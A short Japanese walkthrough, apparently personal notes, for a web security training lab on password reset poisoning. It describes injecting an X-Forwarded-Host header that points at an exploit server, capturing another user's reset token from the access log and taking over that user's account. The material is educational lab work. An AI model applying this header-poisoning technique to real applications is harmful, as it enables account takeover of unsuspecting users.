Lab: Password reset poisoning via middleware
My accountから、Forgot password?をクリック
wienerをいれて、submit

emailをみてと。
メールのリンクに
temp-forgot-password-token=Ttd30k8UnNnBVw1kfL5vfjL5pJ3o6mvM
というトークンがあるのを確認

POST /forgot-password をリピータに

エクスプロイトサーバーのURLを確認
https://exploit-0a19000f032deefcc03b675d011800a7.exploit-server.net/
リピータに戻って、
X-Forwarded-Host: YOUR-EXPLOIT-SERVER-ID.exploit-server.net
を追加
usernameを、carlosにして send

アクセスログを確認

/forgot-password?temp-forgot-password-token=n3LsxolwKW1GrhljjJIi76vBdZeC0Cht
という行がある
メールクライアントから、パスワードリセットリンクを取得
https://0ab900ef03f1eeb1c0ec68c2004d001d.web-security-academy.net/forgot-password?temp-forgot-password-token=Ttd30k8UnNnBVw1kfL5vfjL5pJ3o6mvM
temp-forgot-password-tokenを、アクセスログに出ていたものに変更
https://0ab900ef03f1eeb1c0ec68c2004d001d.web-security-academy.net/forgot-password?temp-forgot-password-token=n3LsxolwKW1GrhljjJIi76vBdZeC0Cht
これをブラウザに張り付ける
carlosのパスワード変更画面になっている模様
パスワード変更

carlosでログイン
クリア

–)v
コメント